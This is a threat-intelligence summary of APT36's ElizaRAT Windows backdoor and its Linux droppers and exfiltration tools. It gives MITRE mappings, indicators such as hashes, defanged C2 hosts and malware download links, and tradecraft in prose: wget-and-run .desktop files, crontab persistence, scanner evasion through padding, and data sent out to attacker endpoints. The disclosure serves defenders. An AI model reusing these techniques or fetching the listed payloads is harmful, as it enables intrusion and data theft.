Keypoints
- APT36 deployed a new .NET-based Windows backdoor dubbed ElizaRAT, delivered in password-protected archives hosted on Google Drive.
- ElizaRAT is compiled as Control Panel applets (.cpl), embeds assemblies with Costura, and uses the Telegram API for C2 commands.
- New Linux attack vectors use malicious .desktop files to wget payloads and decoy PDFs, then chmod/execute payloads and set cron-based persistence.
- Linux payloads include Mythic/Poseidon binaries and Python-compiled ELF utilities for file exfiltration and Firefox session theft.
- Linux desktop entries have been inflated (binary padding with millions of “#” characters) to attempt evasion of scanners.
- Python-based tools search common user paths (/media, Downloads, Documents, Desktop) and exfiltrate archives via HTTP POST to attacker-controlled endpoints.
- C2s include Telegram bots for Windows and HTTPS/port-7443 Mythic panels for Linux implants.
MITRE Techniques
- [T1218.002] System Binary Proxy Execution: Control Panel – ElizaRAT is packaged and executed as a Control Panel applet (.cpl) to run via rundll32. (‘ElizaRAT is distributed in the form of Control Panel applet file format (cpl).’)
- [T1567.002] Exfiltration Over Web Service – ElizaRAT and other tools use web services for communications; ElizaRAT uses Telegram API for C2. (‘ElizaRAT uses the Telegram API for C2 communication.’)
- [T1564.001] Hide Artifacts: Hidden Files and Directories – Linux .desktop files create hidden directories (e.g., ~/.local/share) and drop payloads there. (‘Linux desktop entry file downloads and drops binaries in hidden directories.’)
- [T1036] Masquerading: Match Legitimate Name or Location – Attackers name .desktop files and binaries to resemble PDFs or utilities (Icon=application-pdf, names like pickle-help). (‘Linux desktop entry file downloads and drops binaries in hidden directories.’)
- [T1027.001] Obfuscated Files or Information: Binary Padding – Desktop entry files are inflated by adding >1M “#” characters to evade scanners. (‘More than a million “#” characters are added to the Linux desktop entry file to inflate its file size and potentially bypass security scanning solutions.’)
Indicators of Compromise
- [File Hash – Windows] ElizaRAT sample – fc99daa2e1b47bae4be51e5e59aef1f0 (AgendaMeeting.cpl), 66a69bf967bb882e34b1c32081a9ccee (TextSource.cpl) and other Windows RAT hashes.
- [File Hash – Linux payloads] Mythic/Payload binaries – 98279047a7db080129e5ec84533822ef (pickle-help), 248d4e6bb0f32afd7a1cfb975910235a (ziputils-help), and additional ELF hashes.
- [Filenames] Malicious Control Panel applets & Linux desktop files – AgendaMeeting.cpl, approved_copy.desktop (and other .desktop filenames used to present decoys).
- [Domains] Hosting and distribution – admin-dept[.]in, email9ov[.]in (phishing redirector), plus several .in domains used to host decoys and payloads.
- [IP Addresses] Payload/C2 hosts – 103.2.232[.]82 (payload host), 64.227.138[.]127 (payload host), and other hosting IPs like 64.227.133[.]222.
- [C2 Servers] Mythic C2 panels – 108.61.163[.]195:7443, 64.176.40[.]100:7443 (access via /new/login).
- [Download Links] Google Drive archives distributing ElizaRAT – hxxps://drive.google.com/uc?export=download&id=1SaBv9C5EJlXKCQQ_8Tlkl1cBJ9-9XN8u, hxxps://drive.google.com/uc?export=download&id=140KPyaNuYZgOhP3Q7sTQPZ6a-q6x5j-h
ElizaRAT deployment and runtime: operators package .NET CPL binaries into password-protected ZIP archives hosted on Google Drive; the CPL entrypoint (CplApplet) transfers control to Program.Main → MainAsync where the RAT initializes a Telegram bot (Communicate.ConnectMe), creates %appdata%TextSource, generates a machine-specific UUID/username using WMI (processorID/UUID), drops a decoy PDF from its resources, and establishes persistence by creating a LNK in the Windows Startup folder that executes the control panel applet via rundll32. The RAT performs both local logging (File.AppendAllText) and remote logging via Telegram, enforces a C2 command format of **, and implements commands such as /dir, /upload, /getprocess (writes getproc.dll), /run, /delete, /end, /online, /identity (e.g., hxxps://api.ipify[.]org), /ping, /scr (writes scr.dll), and /createdir.
Linux delivery and execution: attackers distribute ZIP archives containing malicious .desktop files that execute shell commands (often base64-encoded) which wget decoy PDFs and ELF payloads into /tmp or ~/.local/share, chmod +x them, open the decoy via LibreOffice or xdg-open, then execute the payload (e.g., 185.elf, pickle-help, ziputils-help). Variants inflate .desktop files by appending >1M “#” characters to evade scanners. Post-download actions include creating hidden directories (~/.local/share), writing a short reboot-and-run script to /dev/shm/myc.txt, registering it with crontab (crontab -u `whoami` /dev/shm/myc.txt), removing the script, and launching the payload to achieve persistence and execution.
Linux espionage tools and exfiltration: Python-compiled ELF utilities (PyInstaller) perform targeted collection and exfiltration—GLOBSHELL-type binaries recursively scan /media and user paths (Downloads, Documents, Desktop, Pictures, Trash) for predefined extensions, copy matches to ~/.config/bossconfig/usnconfig/, archive to usnconfig.zip and POST it (with username/hostname/timestamp) to hxxp://baseuploads[.]com/myf/test.php. PYSHELLFOX-style utilities locate live Firefox sessionstore backups (files beginning with magic bytes mozLz40x00), LZ4-decompress JSON session data, check tab titles/URLs (e.g., email.gov.in/#, inbox, web.whatsapp.com) and if matched archive ~/.mozilla/firefox into /dev/shm/firefox.zip and exfiltrate to the same POST endpoint. Separately, some Linux payloads are Mythic Poseidon implants contacting HTTPS C2s on port 7443 (e.g., 108.61.163[.]195:7443) for further operator control.
Read more: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal